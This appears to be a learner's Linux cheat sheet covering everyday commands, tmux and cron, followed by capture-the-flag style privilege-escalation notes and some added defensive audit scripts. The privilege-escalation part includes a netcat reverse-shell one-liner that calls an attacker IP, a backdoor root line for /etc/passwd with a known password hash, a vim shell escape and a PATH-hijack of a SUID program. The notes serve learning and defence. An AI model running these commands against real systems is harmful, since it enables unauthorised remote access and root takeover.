Linux Commands

The document provides a comprehensive overview of various Linux commands and their functionalities, including file manipulation, user management, process monitoring, and system information retrieval. It also covers advanced topics such as privilege escalation techniques, cron jobs, and scripting. Additionally, it includes commands for network operations and session management using tmux.

echo <text> > <file> --- overwrite the file
echo <text> >> <file> --- append to the file

&& runs the second command only if the first one exits with status 0 (success)
& background operator, e.g. sleep 5 &, runs the command in the background
$ environment variables, e.g. $USER
export <varname>=<value> --- set a variable for the current shell and every process it starts
most commands take options introduced with -, e.g. grep -n
grep <string> <file> <file2> -n | here -n prints the line number of each match
; runs the second command regardless of whether the first one failed
chsh changes the default login shell for a user
chmod 777 <file> --- rwx for owner, group and everyone else; fine in a lab, but it lets any user modify or run the file
chown user:group file --- changing the owner needs root; a normal user can only change the group, and only to one they belong to
-R recursive, applies to all files in the dir
ln <source> <destination> --- hard link
ln -s <source> <destination> --- symbolic link
sudo -l --- list the commands this user may run with sudo (and as which user)
sudo -u <user> command --- run the command as <user>
adduser <user>
addgroup <group>
usermod -a -G <group> <user>
which <command> shows the full path of the executable that would run
ps -ef all system processes
kill <PID>
top -- shows which processes use most system
2>>/dev/null --- discard error messages (2>/dev/null is enough, nothing accumulates in /dev/null)
crontab -l --list cron jobs
find dir -user <user> || -group works as well
find / -name 'flag*' 2>/dev/null | grep flag5 --- -name takes the pattern; quote it so the shell does not expand it
find / -perm <mode> | searches for files with specific permissions
find [path] [arguments] -exec [command] {} \;
tar -xzf flag8.tar.gz 2>/dev/null --- extract a gzipped tarball, errors discarded
alias --- view command aliases
aliases are saved in ~/.bashrc
MOTD files in /etc/motd or /etc/update-motd.d
cat /etc/update-motd.d/00-header
diff file1.txt file2.txt
logs stored in /var/log
uname -a system info
/etc/os-release
hostnamectl
lsb_release -a
/etc/*release (os-release and lsb-release)
removable media are mounted under /media (mount lists the current mount points)
nano +<line> <file> --- open nano at a specific line
base64 <file> encodes, base64 -d <file> decodes (there is no -e; encoding is the default)
xxd -r -p flag22 | reverse hex to ascii
find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' --- search every file on the root filesystem for a line that is exactly 32 lowercase alphanumerics; -print0/-0 keeps file names with spaces intact
cat flag29 | tr -d ' ' > flag29_noS --- strip spaces
cat flag29_noS | tr -d '\n' > flag29_noSN --- strip newlines
cat flag29_noSN
curl 127.0.0.1
mysql -u <user> -p<password>
show databases;
use database;
show tables;
per-user PATH additions go in /home/<user>/.profile (read at login)
printenv - prints env variables
/etc/group - list of groups on system
echo <string> | rev --- to reverse the string
systemctl start apache2

TMUX
tmux --- new session without a custom name
tmux ls --- list sessions
all key bindings are entered after the prefix ctrl+b
? --- show the list of key bindings
d --- detach from the session
sessions --- windows --- panes (a session holds windows, a window holds panes)
% --- split the pane vertically (new pane to the right)
" --- split the pane horizontally (new pane below)
x --- kill the current pane
<arrows> --- move between panes
ctrl+<arrows> --- resize the current pane
c --- create a new window
0-9 --- switch to the window with that number
[ --- enter copy mode

LINUX PRIV ESC


LinEnum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
attacker machine: python3 -m http.server --- victim machine: wget the script, chmod +x LinEnum.sh, execute
or copy and paste the script into a text editor on the victim machine

LinEnum focuses on kernel info, sensitive files, SUID files and crontabs


find / -perm -u=s -type f 2>/dev/null --- find SUID files on the system (-perm -4000 is the same test in octal)

-perm mode
File's permission bits are exactly mode (octal or symbolic). Since an exact match is required, if you want to use this form for symbolic modes, you may have to specify a rather complex mode string. For example `-perm g=w' will only match files which have mode 0020 (that is, ones for which group write permission is the only permission set). It is more likely that you will want to use the `/' or `-' forms, for example `-perm -g=w', which matches any file with group write permission.

-perm -mode
All of the permission bits mode are set for the file. Symbolic modes are accepted in this form, and this is usually the way in which you would want to use them. You must specify `u', `g' or `o' if you use a symbolic mode.

-perm /mode
Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples. If no permission bits in mode are set, this test matches any file (the idea here is to be consistent with the behaviour of -perm -000).

Operators join together the other items within the expression. They include for example -o (meaning logical OR) and -a (meaning logical AND).
\( ... \) --- groups the expression inside the parentheses (escaped so the shell does not interpret them)
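As an added example (not part of the original notes), a small script built around the -perm tests above: it lists set-uid and set-gid files with -perm /6000 and compares them against a known-good baseline so that a newly planted SUID binary stands out. The baseline format (one absolute path per line) is an assumption of this example.

```shell
#!/bin/sh
# Added example: SUID/SGID hunting with find -perm, plus a baseline comparison.
# Assumption (not from the notes): BASELINE is a text file listing known-good
# set-uid/set-gid paths, one absolute path per line.

# find_suid ROOT
# Print every regular file under ROOT that has the set-uid OR set-gid bit.
# -perm /6000 means "any of the bits 4000|2000 is set"; -perm -4000 would mean
# "set-uid must be set". -xdev keeps find on one filesystem (skips /proc etc.)
# and stderr goes to /dev/null exactly as in the notes above.
find_suid() {
    find "$1" -xdev -type f -perm /6000 2>/dev/null | sort
}

# diff_suid ROOT BASELINE
# Print set-uid/set-gid files under ROOT that are not listed in BASELINE.
# Exit status 0 = nothing new, 1 = at least one unexpected file, so the
# function can gate a cron job or a CI check.
diff_suid() {
    # grep -v -x -F -f: drop the lines that exactly match a baseline line
    new=$(find_suid "$1" | grep -v -x -F -f "$2" || true)
    if [ -n "$new" ]; then
        printf '%s\n' "$new"
        return 1
    fi
    return 0
}

# Typical use on a live host (first run records the baseline, later runs diff):
#   find_suid / > /var/lib/suid.baseline
#   diff_suid / /var/lib/suid.baseline || echo "new set-uid/set-gid files found"
```

The baseline must be recorded on a host you trust; if it is taken after a compromise, the attacker's binary is simply baked into it.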

/etc/shells -- shows available shells on system

user:x:0:0:root:/root:/bin/bash ------ general /etc/passwd entry: username : password : UID : GID : comment (GECOS) : home : shell

x means the password hash is kept in /etc/shadow, not here; 0 is the user id (0 = root), 0 the primary group id, root the comment/info field, /root the home directory, /bin/bash the login shell

openssl passwd [-help] [-crypt] [-1] [-apr1] [-salt string] [-in file] [-stdin] [-noverify] [-quiet] [-table] {password}
openssl passwd -1 -salt new 123 --- MD5-crypt hash of the password 123 with salt new: $1$new$p7ptkEKU1HnaHpRtzNizS1

user:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash --- if /etc/passwd is writable, appending this line creates a second UID 0 account (log in as user with password 123); because field 2 is a hash rather than x, login checks it directly instead of /etc/shadow
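As an added example (not part of the original notes), the defender's view of the openssl passwd trick above: a shell function that audits an /etc/passwd-format file and flags any extra UID 0 account, any entry carrying a hash in field 2 instead of x, and any empty password field. The sample passwd content is constructed here and includes the notes' own backdoor line.

```shell
#!/bin/sh
# Added example: audit an /etc/passwd-style file for the backdoors the notes
# describe (a second UID 0 user, a hash placed directly in field 2).

# audit_passwd FILE
# Prints one finding per line and returns 1 if anything was found, 0 if clean:
#   UID0 <name>    account other than root with user id 0
#   HASH <name>    field 2 is a hash rather than x (shadow) or a lock marker;
#                  login uses it directly, which is why the openssl trick works
#   EMPTY <name>   field 2 is empty, i.e. login without any password
audit_passwd() {
    findings=$(awk -F: '
        NF < 7                                  { next }              # malformed line
        $3 == 0 && $1 != "root"                 { print "UID0 " $1 }
        $2 == ""                                { print "EMPTY " $1; next }
        $2 != "x" && $2 != "*" && $2 !~ /^!+$/  { print "HASH " $1 }
    ' "$1")
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Constructed sample (not from a real host); the third line is the notes'
# "user" entry produced with openssl passwd -1 -salt new 123.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
}

# On a host:  audit_passwd /etc/passwd || echo "passwd looks tampered with"
```

Run against the sample, the function reports UID0 user, HASH user and EMPTY guest. A real audit should also confirm that /etc/passwd itself is not writable by anyone but root (ls -l /etc/passwd), since that is the precondition for the trick.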

ESCAPE VI
check sudo -l for which commands this user may run as root
in vim, press : to enter command-line mode
:!sh --- run a shell from inside vim
:!/bin/bash --- run /bin/bash instead; if vim was started as root via sudo, the shell is root
https://gtfobins.github.io/

CRONTAB
MIN   what minute to execute at
HOUR  what hour to execute at
DOM   what day of the month to execute at
MON   what month of the year to execute at
DOW   what day of the week to execute at
CMD   the actual command that will be executed
0 */12 * * * cp -R /home/cmnatic/Documents /var/backups/ --- at minute 0 every 12 hours
crontab -e --- edit the current user's crontab
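An added example (not from the original notes) that turns the crontab format above into a quick privilege-escalation check: it parses a user-format crontab, takes the program each job runs and reports scripts we can write to, commands given without a path (resolved through the cron PATH, so a writable directory early in that PATH would hijack them) and absolute paths that do not exist yet. The sample crontab is constructed.

```shell
#!/bin/sh
# Added example: audit a user-format crontab (5 time fields, then the command)
# for the classic escalation conditions. Run it as the low-privileged user so
# that [ -w ] answers "can *I* modify this" (as root it is always true).

# cron_audit CRONTAB_FILE
# For each job, take the first word of the command and print:
#   WRITABLE <path>  the script the job runs is writable by us
#   MISSING  <path>  absolute path that does not exist (we could create it)
#   RELATIVE <name>  no path given, so it is resolved through the cron PATH
# Comments, blank lines and VAR=value lines are skipped; @reboot-style
# lines carry the command in field 2. /etc/crontab has an extra user field
# (command in field 7), adjust NF/$6 for that file.
cron_audit() {
    awk '
        /^[ \t]*#/                 { next }      # comment
        /^[ \t]*$/                 { next }      # blank line
        /^[A-Za-z_][A-Za-z0-9_]*=/ { next }      # SHELL=, PATH=, MAILTO= ...
        /^@/                       { print $2; next }
        NF >= 6                    { print $6 }
    ' "$1" | while IFS= read -r cmd; do
        case $cmd in
            /*) if [ ! -e "$cmd" ]; then echo "MISSING $cmd"
                elif [ -w "$cmd" ]; then echo "WRITABLE $cmd"
                fi ;;
            *)  echo "RELATIVE $cmd" ;;
        esac
    done
}

# sample_crontab DIR --- constructed crontab whose backup job lives in DIR
sample_crontab() {
    cat <<EOF
# m h dom mon dow command  (constructed sample, not from a real host)
PATH=/usr/local/bin:/usr/bin:/bin
0 */12 * * * $1/backup.sh
*/5 * * * * cleanup-tmp
@reboot /opt/missing/agent
EOF
}

# On a host:  cron_audit /var/spool/cron/crontabs/root   (needs read access)
```

Only the first word of each command is inspected; jobs of the form sh /path/script.sh or those using && and pipes need the later words checked as well.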

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R --- generate a netcat reverse shell one-liner; the output is a command of this shape:

mkfifo /tmp/jzzf; nc 10.10.90.95 8888 0</tmp/jzzf | /bin/sh >/tmp/jzzf 2>&1; rm /tmp/jzzf

PATH VARIABLE
a SUID root program calls ls without a full path, so the binary is looked up through PATH. Create a file named ls in /tmp containing /bin/bash and make it executable, then
export PATH=/tmp:$PATH --- now every time the program runs ls it executes our file and opens bash as root
real ls path: /bin/ls
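An added example (not from the original notes) that reproduces the PATH hijack mechanically without any SUID binary, so it is safe to run as a normal user: a victim script calls ls, a fake ls is dropped in a temp directory that is prepended to PATH, and the function returns what the victim actually executed. The three modes show the vulnerable call, the fix of using the absolute path, and the fix of resetting PATH inside the program.

```shell
#!/bin/sh
# Added example: PATH hijacking, demonstrated safely (no SUID involved).
# In the notes the victim is a SUID-root program that runs "ls"; here the
# victim is a plain script so the effect can be observed as a normal user.

# path_hijack_demo MODE
#   MODE = vulnerable   victim runs "ls" by name
#   MODE = absolute     victim runs "/bin/ls"
#   MODE = reset-path   victim sets PATH=/usr/bin:/bin before running "ls"
# Prints what the victim's ls printed: HIJACKED means our fake ls ran,
# "/" means the real "ls -d /" ran.
path_hijack_demo() {
    work=$(mktemp -d)

    # the attacker's ls (in the notes: /tmp/ls containing /bin/bash)
    printf '#!/bin/sh\necho HIJACKED\n' > "$work/ls"
    chmod +x "$work/ls"

    # the victim, written in the shape selected by MODE
    case $1 in
        vulnerable) printf '#!/bin/sh\nls -d /\n' > "$work/victim.sh" ;;
        absolute)   printf '#!/bin/sh\n/bin/ls -d /\n' > "$work/victim.sh" ;;
        reset-path) printf '#!/bin/sh\nPATH=/usr/bin:/bin\nls -d /\n' > "$work/victim.sh" ;;
        *) rm -rf "$work"
           echo "usage: path_hijack_demo vulnerable|absolute|reset-path" >&2
           return 2 ;;
    esac

    # the step from the notes: our directory goes first in PATH, then the victim runs
    result=$(PATH="$work:$PATH" sh "$work/victim.sh")
    rm -rf "$work"
    printf '%s\n' "$result"
}
```

In the notes' real scenario the payload is /bin/bash; note that bash drops the effective uid when it differs from the real one unless started with -p, so the fake ls would need to exec bash -p (or a different payload) to keep root.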

1. python -c "import pty; pty.spawn('/bin/bash');" --- upgrade the reverse shell to a pty
2. export TERM=xterm --- so clear, nano etc. know the terminal type
3. ctrl+z --- background the shell
4. stty raw -echo; fg --- stop the local terminal echoing, then bring the shell back (tab completion and ctrl+c now work)

SCP:
scp important.txt <user>@<host>:/home/ubuntu/transferred.txt --- local to remote
scp <user>@<host>:/home/ubuntu/documents.txt notes.txt --- remote to local
